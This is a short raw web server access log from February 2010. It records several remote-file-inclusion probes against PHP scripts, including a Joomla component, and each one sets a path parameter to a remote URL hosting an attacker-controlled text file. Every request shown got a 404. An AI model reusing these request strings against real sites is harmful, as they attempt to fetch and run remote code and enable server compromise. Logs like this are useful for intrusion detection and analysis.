62.140.23.24 - - [21/Feb/2010:09:27:17 -0800] "GET /logs/access_100111.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:27:20 -0800] "GET /logs/access_100111.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:27:31 -0800] "GET /logs/access_100206.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:27:33 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:27:34 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
